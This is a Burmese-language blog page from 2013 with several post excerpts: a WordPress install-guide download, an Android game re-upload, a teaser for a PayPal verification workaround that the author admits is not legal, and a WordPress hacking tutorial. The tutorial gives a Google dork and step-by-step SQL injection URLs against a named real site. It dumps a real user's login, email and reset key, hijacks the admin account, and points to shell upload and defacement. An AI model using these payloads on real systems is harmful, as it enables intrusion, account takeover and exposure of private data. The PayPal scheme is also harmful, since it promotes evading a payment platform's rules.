9/22/2013

Wordpress Installation Guide in Localhost

ကြ်န္ေတာ္ wp ကုိ localhost ေပၚမွာတင္ျပီး test လုပ္ခ်င္တာ ဒီစာအုပ္နဲ႔ေတြ႕မွပဲအဆင္ေျပသြားတယ္။ မသိရင္ေတာ့ ဘယ္အရာပဲျဖစ္ျဖစ္ ေတာ္ေတာ္တုိင္ပတ္တာဗ်။ အခုေတာ့ ဒီစာအုပ္ေလးနဲ႔ဆုိရင္ အမ်ားၾကီးအဆင္ေျပသြားပါျပီ။ ဟက္ကင္းေလ့လာမယ့္သူမ်ားအေနနဲ႔ ဒီ wp platform ကုိရင္းႏွီးခ်င္ရင္ Localhost မွာအရင္ေလ့လာသင့္တယ္ထင္ပါတယ္။ အထဲက Dashboard ပုံစံေတြကုိ wp admin access ရမွာျမင္ရမွာကုိး။ ကုိယ္ဘာသာဝယ္ထားရင္ေတာ့ တမ်ဳိးေပါ့ဗ်ာ။ ကဲ ယူထားလုိက္ၾကရေအာင္။

Download: Solidfiles Mediafire

Credit: Technovilla
Read more »

Candy Crush Saga 1.15.1

မနက္အေစာၾကီးဆုိေတာ့ လူမရွိလုိ႔လားမသိပါဘူးဗ်ာ။ ကြန္နက္ရွင္က သိပ္မဆုိးတာနဲ႔ ေဒါင္းျပီး ျပန္တင္ေပးလုိက္ပါတယ္။ ေတာင္ထားတဲ့သူတစ္ေယာက္အတြက္ပါ။ ကြ်န္ေတာ္ကေတာ့ ဒီလုိဂိမ္း တစ္ခါမွမေဆာ့ျဖစ္ေတာ့ ဘယ္လုိေဆာ့ရတယ္ဆုိတာမသိပါဘူး။ ဖုိင္ဆုိဒ္က 40 MB ရွိပါတယ္။ ေဒါင္းရလြယ္ေအာင္ ျပန္ခ်ဳံ႕ထားပါတယ္။ ေဒါင္းျပီးရင္ေတာ့ WinRAR နဲ႔ ျပန္ျပီး extract လုပ္လုိက္ေပါ့ေနာ္။ ျပီးရင္ Android မွာသြင္းျပီးေဆာ့ႏုိင္ပါျပီ။ ဗားရွင္း 1.1 အထက္လားမသိဘူး။ ေဆာ့လုိ႔ရတယ္ဆုိေတာ့ အဆင္ေျပမွာပါ။ အဆင္ေျပပါေစဗ်ာ။

Download: Mediafire
Read more »

Myanmar IP ျဖင္႔သာ Verifyျဖစ္ေသာ PayPal ျပဳလုပ္အသံုးျပဳနည္း ထြက္မည္ဟုသတင္းရရွိ

အားလံုးပဲ မဂၤလာပါခဗ်ာ.. 

ကြ်န္ေတာ္ ျမန္မာႏိုင္ငံကေန မည္သည့္ Proxy မွ မသံုးပဲ Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ Pay Pal အေကာင္႔ကို ေျပာျပမယ္လို႔ ကတိေပးခဲ႔ပါတယ္။

ကြ်န္ေတာ္ အခု မၾကာခင္ အခ်ိန္အတြင္း မွာ Myanmar IP နဲ႔ ပဲ Verify ျဖစ္တဲ႔ PayPal အေကာင္႔ ရေအာင္လုပ္နည္းေျပာျပပါေတာ႔မယ္။ 

ကြ်န္ေတာ္ ကိုယ္တိုင္ အခုလက္ရွိသံုးေနတာျဖစ္သလို ၆လ ေက်ာ္၊ သြားျပီလဲ။ ကြ်န္ေတာ္ ဒီနည္းကို ရဖို႔ $100 နည္းပါး  စမ္းသပ္ရင္းနဲ႔ ကုန္က် ခဲ႔ပါတယ္။ ကြ်န္ေတာ္႔ကို  အဲ႔အတြက္ ShweMoney Company က Sponsor အေနနဲ႔ $50 ထုတ္ေပးခဲ႔သလို ကြ်န္ေတာ္ အဲ႔ဒီ $50 ကိုလည္း ကိုယ္က်ိဳး မၾကည့္ပဲ PayPal စမ္းသပ္တဲ႔ အထဲထည့္ခဲ႔ပါတယ္။

ဒီနည္းကို မည္သည့္ေနရာကမွ Clone ရိုက္ထားျခင္း မရွိသလို Copy ကူးထားျခင္း မရွိပါဘူး။ Idea ပင္ Copy ကူးထားျခင္းမရွိပါဘူး လို႔ ေျပာၾကားလိုပါတယ္။ Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ Pay Pal အေကာင္႔ လုပ္နည္းရွာ စိတ္ကူးရွိလာတာက ေတာ႔

ကြ်န္ေတာ္႔ Proxy နဲ႔ အသံုးျပဳေနတဲ႔ Verify လုပ္ျပီးျဖစ္တဲ႔ PayPal အေကာင္႔ ႏွစ္ခု Lock က်ျပီး စိတ္ဆင္းရဲရာက စခဲ႔ပါတယ္လို႔ ၀န္ခံ ေျပာၾကား လိုက္ပါရေစ။

ဒီနည္းလမ္းဟာ ျမန္မာ ျပည္သူ ျပည္သား အားလံုးအတြက္ အက်ိဳးရွိမယ္လို႔ ေမွ်ာ္လင္႔ပါတယ္။ Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ Pay Pal ျပဳလုပ္နည္း တင္ျပရျခင္းရည္ရြယ္ခ်က္ကေတာ႔ ျမန္မာ႔ စီးပြားေရးကို တစ္ဖက္တစ္လွမ္းက တိုးတက္ ေကာင္းမြန္ေစခ်င္တဲ႔ ရည္ရြယ္ခ်က္ေၾကာင္႔ပါ။

PayPal က တရား၀င္ ခြင္႔ျပဳထားတာ မဟုတ္ေသာ္လည္း Online ေပၚမွာ ဘာမွ အက်ိဳးမရွိ အခ်ိန္ကုန္ေနမဲ႔ အစား Online ေပၚကေန စီးပြားေရး အဆင္ေျပေျပလုပ္ႏိုင္ပါေစ ဆိုတဲ႔ ရည္ရြယ္ခ်က္နဲ႔ ပဲျဖစ္ပါတယ္။ ကြ်န္ေတာ္ တစ္ေယာက္တစ္ေယာက္ထဲ သိျပီး မိမိကိုယ္တိုင္ လုပ္ေနလဲ ရပါတယ္။ 

ဒါေပမဲ႔ အားလံုးကို အဆင္ေျပပါေစ ၊ ဆိုတဲ႔ ရည္ရြယ္ခ်က္နဲ႔ ဒီနည္းလမ္းကို အခ်ိန္ၾကာျမင္႔ေအာင္ ေရးသား ေျပာၾကားလိုက္ရပါတယ္။


PayPal account ရျပီဆိုတာနဲ႔ သင္ဟာ ေငြလက္ခံရရွိႏိုင္ပါျပီလို႔ ေျပာၾကားလိုက္ပါရေစ.. PayPal မွာ ေငြရွိလာျပီး ဆိုရင္ PayPal ကေန ျမန္မာ ႏိုင္ငံဘဏ္ကေန ေငြထုတ္ဖို႔ ေျပာၾကားေပးသြားဦးမွာျဖစ္ပါတယ္။ အားလံုးပဲ စိတ္အားထက္သန္စြာဖတ္ရွဳ ႏိုင္ပါတယ္။

ကြ်န္ေတာ္အေနနဲ႔ ႏိုင္ငံ အားျဖင္႔ Thai,Malaysia,Singapore,US စတဲ႔ ႏိုင္ငံေတြကို ကို ျမန္မာႏိုင္ငံ IP နဲ႔ ၀င္ေရာက္ ျပီး စမ္းသပ္ခဲ႔ပါတယ္။ အဲ႔ထဲမွာမွ Thai နဲ႔ Malay က Myanmar IP နဲ႔ ၀င္ေရာက္ အသံုးျပဳလို႔ ရခဲ႔ပါတယ္။ ဒါေပမဲ႔ ကြ်န္ေတာ္ Myanmar IP ကို အသံုးျပဳ ျပီး Credit Card ခ်ိတ္ၾကည့္တဲ႔ အခါမွာ Thai ေရာ Malay ေရာဟာ Location Confirm ခိုင္းတဲ႔ ျပႆနာ တက္ျပီး အေကာင္႔ ေတြ Suspend ဆိုျပီး Lock က် ကုန္ပါတယ္။အဲ႔လိုနဲ႔ စိတ္ဆင္းရဲ စြာနဲ႔ လိုက္ရွာရင္း ေနာက္ဆံုး မွာ ကြ်န္ေတာ္ ႏိုင္ငံ တစ္ႏိုင္ငံကို ေတြ႔ ခဲ႔တယ္။ အဲ႔ႏိုင္ငံက စမ္းလုပ္ ၾကည့္ေတာ႔ အဆင္ေျပတာ ကို ေတြ႔ ရျပီး ေနာက္ဆံုးမွာ အခုထိ Lock မက် ပဲ Myanmar IP နဲ႔ပဲ Verify ျဖစ္တဲ႔ အေကာင္႔ကို ရယူ ပိုင္ဆိုင္ခဲ႔ပါတယ္။

ကြ်န္ေတာ္ တစ္ခု ၾကိဳမွာ ထားခ်င္တာကေတာ႔ ျမန္မာ ႏိုင္ငံကေန Pay Pal ကို အသံုးျပဳဖို႔ PayPal က ခြင္႔ျ႔ပဳထားျခင္း မရွိတဲ႔ အတြက္ ဒီနည္းလမ္းဟာ Legal ျဖစ္မွာ မဟုတ္ပါဘူး။ တကယ္လို႔ Policy Updates ေၾကာင္႔ အေၾကာင္းတစ္ခုခု ျဖစ္ပ်က္ခဲ႔ပါက ကြ်န္ေတာ္ ကယ္တင္ႏိုင္မွာ မဟုတ္ပါဘူး။

Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ PayPal ရေအာင္ ကြ်န္ေတာ္႔ အေတြ႔ အၾကံဳ နဲ႔ ျပန္လည္ ကူညီေပးျခင္းသာျဖစ္ပါတယ္။ ထို႔ေၾကာင္ ဒီနည္းလမ္းကို ကြ်န္ေတာ္႔ အၾကံျပဳခ်က္အတိုင္း အသံုးျပဳေစခ်င္ပါတယ္။ အကယ္လို႔ မိမိစိတ္ၾကိဳက္ လုပ္မယ္ဆိုပါက Make Your Own Risk လို႔သာ ေျပာၾကားပါရေစ။


အေၾကာင္း တစ္ခု ျဖစ္ပ်က္ခဲ႔ပါက ကြ်န္ေတာ္ အၾကံေပးရံုသာ တတ္ႏိုင္မွာျဖစ္ပါတယ္။

အခု ကြ်န္ေတာ္ Myanmar IP နဲ႔ ျဖစ္ေပမဲ႔ Verify ျဖစ္တဲ႔ Pay Pal ကို ရယူ အသံုးျပဳနည္းကို ေျပာျပေပးသြားမွာပါ။

Myanmar IP နဲ႔ Verify ျဖစ္တဲ႔ Pay Pal ကို ရယူ အသံုးျပဳနည္း ဖတ္ရွဳ ဖို႔ ေအာက္ပါအခ်က္မ်ားကို သေဘာတူညီ ေပးဖို႔လိုပါတယ္။

1) ကြ်ႏွဳပ္သည္ Myanamr IP ျဖင္႔သာ Verify ျဖစ္ေသာ PayPal အေကာင္႔ ရယူ အသံုးျပဳနည္းကို ဖတ္ရွဳလိုသည္။

2) လမ္းညႊန္ခ်က္ကို အျပည့္အစံု ေသခ်ာစြာဖတ္ရွဳပါမည္။ ျပဳလုပ္နည္းမွ ညႊန္ၾကားခ်က္မ်ားကို သတိထားလိုက္နာမည္ ဟု ကတိေပးပါသည္။

3) ျမန္မာႏိုင္ငံမွေနျပီး Verify ျဖစ္ေသာ PayPal အေကာင္႔ ရယူ အသံုးျပဳနည္း ႏွင္႔ ပတ္သက္ျပီး အခ်ိန္မေရြး ေျပာင္းလဲ ေသာ ညႊန္ၾကားခ်က္မ်ားကို လိုက္နာပါမည္။

4) စာေရးသူသည္ သူတစ္ပါးအား ေစတနာျဖင္႔ ေျပာၾကားေပးျခင္းျဖစ္သည္။ ကြ်ႏွဳပ္ စာေရးသူ၏ ေစတနာကို နားလည္ပါသည္။ အေၾကာင္း တစ္ခုခု ျဖစ္ပ်က္ခဲ႔ပါက သူ႔ကို အျပစ္ေျပာမည္မဟုတ္ဘဲ သူ႔ထံမွ အၾကံဥာဏ္ အကူအညီ ရယူမည္ဟု ကတိေပးပါသည္။


အားလံုးပဲ သေဘာတူတယ္ဆိုရင္ Comment ေပးထားပါ။ ေနာက္ျပီး ဆက္လက္ မဲ႔ PayPal အေကာင္႔ ျပဳလုပ္နည္း အတြက္ သေဘာတူတဲ႔ သူေတြ ပဲ ကြ်န္ေတာ္႔ အေနနဲ႔ ဖတ္ခြင္႔ ေပးမွာ ျဖစ္ျပီး အခ်က္ကို မလိုက္နာ ႏိုင္တဲ႔ သူ မ်ားအား တစ္စံုတစ္ရာညႊန္ၾကား ေျပာဆိုမွာ မဟုတ္ပါဘူး။

မၾကာခင္ ကြ်န္ေတာ္ Myanmar IP ျဖင္႔သာ Verifyျဖစ္ေသာ PayPal ျပဳလုပ္ အသံုးျပဳနည္း တင္ေပးသြားပါ႔မယ္။


မိမိထံ Mail ေရာက္ခ်င္ရင္ေတာ႔ http://www.techmilo.tk မွာ member ၀င္ထားျပီးေတာ႔ ျဖစ္ျဖစ္ ၊ email subscirbe လုပ္ျပီးေတာ႔ပဲ ျဖစ္ျဖစ္ လုပ္ထားႏိုင္ပါတယ္။

email - fullpremiumnowfree@gmail.com
         - contact@shwemoovi.com

Facebook - https://www.facebook.com/TechMilo  
              - https://www.facebook.com/FPNFOfficial

From Official Team ,
Steel Jelly [Miloboy Inc.]
Chief Editor Of Full Premium Now Free
Founder Of Tech Milo : Online Magazine
Read more »

How to Hack Wordpress Site

WP ကုိ ဟက္ခ်င္ပါတဲ့ဆုိတဲ့ညီအကုိမ်ားအတြက္ ဒီပုိ႔စ္ေလးကအေထာက္အကူျပဳမယ္ထင္ပါတယ္။ ဒီပုိ႔စ္ကနည္းအတုိင္းမလုပ္ခင္ SQL Injection အေၾကာင္းနည္းနည္းပါးပါးနားလည္ရင္ေတာ့ ေကာင္းမယ္ဗ်။ ဘာလုိ႔လဲဆုိေတာ့ ကြ်န္ေတာ္ကုိနည္းေျပာျပေနတဲ့အခ်ိန္မွာ မလုပ္ဖူးေတာ့ ေတာ္ေတာ္ေခါင္းစားလုိ႔ပါ။ အေျခမခုိင္ေတာ့ ဟီး ကဲဗ်ာ ဒီေန႔ေတာ့ ကြ်န္ေတာ္ ဆရာတစ္ေယာက္ေျပာျပတဲ့နည္းကုိ ျပန္ရွယ္ေပးလုိက္ပါတယ္။ wp ကုိဟက္ခ်င္တယ္ေျပာတဲ့ ညီအကုိမ်ားအတြက္ပါ။ (မ်ဳိးၾကီးေလသံျဖင့္ :D) ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ vul ျဖစ္ေနတဲ့ ဆုိဒ္ေတြကုိရွာရပါမယ္။ ဒီေတာ့ Google မွာေအာက္က Dork ေလးနဲ႔အရင္ရွာလုိက္ပါ။

Dork: inurl:"fbconnect_action=myhome"



ကဲ အဲဒီလင့္ေတြအမ်ားၾကီးထဲမွာ 10,7,6 ဆုိတာပါရင္ SQL Vul ျဖစ္ေနတဲ့ဆုိဒ္ျဖစ္ပါတယ္။ လင့္ေတြကုိဝင္ၾကည့္ျပီးရွာၾကည့္ေပါ့ေနာ္။ကြ်န္ေတာ္နမူနာျပထားတဲ့ဆုိဒ္ကုိ ေအာက္မွာေသခ်ာၾကည့္လုိက္ပါ။

sqli =>
site.com/fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--   In My case,
http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--

ဟုတ္ျပီဗ်ာ။ ဝုိင္းထားတဲ့ေနရာမွာ ကြ်န္ေတာ္တုိ႔ရွာေနတဲ့ vul နဲ႔ကုိက္ပါျပီ။ ဒါက SQL ေပါက္ေနတာပါ။

Stato:
Nome: 10
Membro da: 7
Website URL: 6


ကဲ ေနာက္တစ္ဆင့္ကေတာ့ table prefix ကုိစစ္မယ္ဗ်ာ။ အသုံးျပဳရမယ့္ဟာကေတာ့

sqli=>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--

ျဖစ္ပါတယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12--  ဒီေနရာမွာ http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,group_concat(table_name),11,12+from+information_schema.tables+where+table_schema=database()--   ဒီလုိေလးအစားထုိးေပးလုိက္တာေပါ့ေနာ္။ ဒါဆုိရင္ ေအာက္ကလုိေတြ႕ရပါမယ္။


ဒါဆုိရင္ အေပၚက ပုံမွာျပထားတဲ့အတုိင္း wp_ prefix ေတြကုိ ip2nation,ip2nationCountries,wp_Counterize,wp_Counterize_Keywords,wp_Counterize_Pages ဝုိင္းထားသလုိမ်ဳိးျမင္ေနရပါျပီ။ ဒီအဆင့္ထိေအာင္ျမင္ျပီဆုိ ေနာက္တစ္ဆင့္ကုိသြားမယ္ဗ်ာ။

sqli =>
site.com/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email),8,9,10,11,12+from+wp_users--

ဒီေတာ့ ကြ်န္ေတာ္တုိ႔ ဒီလုိေလးအစားထုိးျပီး ေခၚၾကည့္လုိက္မယ္။ In my case, http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users--   ဒါကေတာ့ အဲဒီဆုိဒ္မွာရွိတဲ့ username, email address ကုိလွမ္းျပီးႏွိက္ၾကည့္တဲ့ SQL တစ္ခုေပါ့ေနာ္။ ဒါဆုိရင္ ဆုိဒ္မွာ သုံးထားတဲ့ username, email address ကုိေတြ႕ရပါျပီ။ ဒါကုိခဏမွတ္ထားေပးပါ။ ေနာက္တစ္ခါျပန္သုံးရမွာမုိ႔ပါ။


Stato:
Nome: 10
Membro da: 2:Rudy::r.checchin@gmail.com
Website URL: 6

ဒီေတာ့ Username က Rudy, email address က  r.checchin@gmail.com ဆုိျပီးသိရပါျပီ။ေနာက္တစ္ဆင့္သြားမယ္ဗ်ာ။ အဲဒီဆုိဒ္ရဲ႕ admin login panel ကုိသြားပါ။ ျပီးရင္ password ေမ့သြားပါတယ္ဆုိျပီး Request လုပ္လုိက္မယ္။ http://www.wildwind.it/wp-admin/


ဒါဆုိရင္ Password Forget တဲ့အတြက္ Recover ျပန္လုပ္ဖုိ႔ သူက သက္ဆုိင္ရာ email ဆီ activate လုပ္ဖုိ႔ျပင္ဆင္ပါလိမ့္မယ္။ ဒီေတာ့ ခုနက ကြ်န္ေတာ္တုိ႔ရထားတဲ့ email နဲေအာက္လုိျဖည့္ေပးျပီး Enter ေခါက္ေပးလုိက္ေပါ့ဗ်ာ။ ကဲ လာျပီ။ ေနာက္တစ္ခု။


ျပီးရင္ ေအာက္ကပုံအတုိင္းေတြ႕ရပါမယ္။ Box ႏွစ္ခုလုံးမွာ ဘာမွမေရးဘဲ ခဏခ်န္ထားလုိက္ပါ။



http://www.wildwind.it/?fbconnect_action=myhome&fbuserid=0+and+1=2+union+select+1,2,3,4,5,6,group_concat%28ID,0x3a,user_login,0x3a,user_activation_key,0x3a,user_email%29,8,9,10,11,12+from+wp_users-- ျပီးရင္ ေစာေစာက မွတ္ထားတာေလး ျပန္ၾကည့္မယ္။ အဲဒီမွာ user name က Rudy, Activation key က hSTGEM9iWvnryRgJL6tz   ျဖစ္ပါတယ္။


ဒီေတာ့ username, activation key ကုိ ဒီေနရာေလးမွာ အစားထုိးေပးရမွာျဖစ္ပါတယ္။

http://www.wildwind.it/wp-login.php?action=rp&key=key&login=username

ဒါဆုိရင္ ေအာက္ကအတုိင္း ျဖစ္သြားမွာပါ။


www.wildwind.it/wp-login.php?action=rp&key=hSTGEM9iWvnryRgJL6tz&login=Rudy

အဲဒီမွာ ကုိယ္လုိခ်င္တဲ့ password ရုိက္ထည့္ေပးရုံပါပဲ။ ထုံးစံအတုိင္းႏွစ္ခါမွန္ေအာင္ရုိက္ေပးလုိက္ပါ။



ဒါဆုိရင္ ေအာက္ကလုိ Accept ျဖစ္သြားပါမယ္။


ကဲ ေနာက္ဆုံးအဆင့္ေရာက္ပါျပီ။ wp-admin ကုိျပန္သြားျပီး ခုနက ကြ်န္ေတာ္တုိ႔ေပးထားတဲ့ password အသစ္နဲ႔ login ဝင္ႏုိင္ပါျပီ။ username က Rudy ေနာ္။ http://www.wildwind.it/wp-admin


Bravo! I'm in :D


ကဲ ဒါဆုိရင္ေတာ့ shell တင္မယ္။ ေနာက္ Deface တင္လုိ႔ရပါျပီ။ shell တင္နည္းကုိေတာ့ ဒီ မွာျပန္ၾကည့္ႏုိင္ပါတယ္။  Deface တင္နည္းကုိလည္း ဒီ မွာၾကည့္ႏုိင္ပါတယ္။ အဆင္ေျပၾကပါေစ။


Special Thanks to: $0m30n3 (BMH)
Read more »